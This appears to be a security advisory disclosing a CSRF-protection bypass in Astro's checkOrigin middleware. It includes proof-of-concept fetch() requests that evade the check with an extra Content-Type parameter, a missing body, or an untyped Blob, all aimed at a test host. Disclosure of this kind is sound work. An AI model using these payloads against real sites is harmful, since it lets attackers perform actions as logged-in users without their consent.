A bug in Astro’s CSRF-protection middleware allows requests to bypass CSRF checks.
When the security.checkOrigin
configuration option is set to true
, Astro middleware will perform a CSRF check. (Source code: https://github.com/withastro/astro/blob/6031962ab5f56457de986eb82bd24807e926ba1b/packages/astro/src/core/app/middlewares.ts)
For example, with the following Astro configuration:
// astro.config.mjs
import { defineConfig } from 'astro/config';
import node from '@astrojs/node';
export default defineConfig({
output: 'server',
security: { checkOrigin: true },
adapter: node({ mode: 'standalone' }),
});
A request like the following would be blocked if made from a different origin:
// fetch API or <form action="https://test.example.com/" method="POST">
fetch('https://test.example.com/', {
method: 'POST',
credentials: 'include',
body: 'a=b',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
});
// => Cross-site POST form submissions are forbidden
However, a vulnerability exists that can bypass this security.
Content-Type
A semicolon-delimited parameter is allowed after the type in Content-Type
.
Web browsers will treat a Content-Type
such as application/x-www-form-urlencoded; abc
as a simple request and will not perform preflight validation. In this case, CSRF is not blocked as expected.
fetch('https://test.example.com', {
method: 'POST',
credentials: 'include',
body: 'test',
headers: { 'Content-Type': 'application/x-www-form-urlencoded; abc' },
});
// => Server-side functions are executed (Response Code 200).
Content-Type
headerThe Content-Type
header is not required for a request. The following examples are sent without a Content-Type
header, resulting in CSRF.
// Pattern 2.1 Request without body
fetch('http://test.example.com', { method: 'POST', credentials: 'include' });
// Pattern 2.2 Blob object without type
fetch('https://test.example.com', {
method: 'POST',
credentials: 'include',
body: new Blob(['a=b'], {}),
});
Bypass CSRF protection implemented with CSRF middleware.
[!Note] Even with
credentials: 'include'
, browsers may not send cookies due to third-party cookie blocking. This feature depends on the browser version and settings, and is for privacy protection, not as a CSRF measure.
{ "nvd_published_at": "2024-12-18T21:15:08Z", "cwe_ids": [ "CWE-352" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-12-18T15:02:37Z" }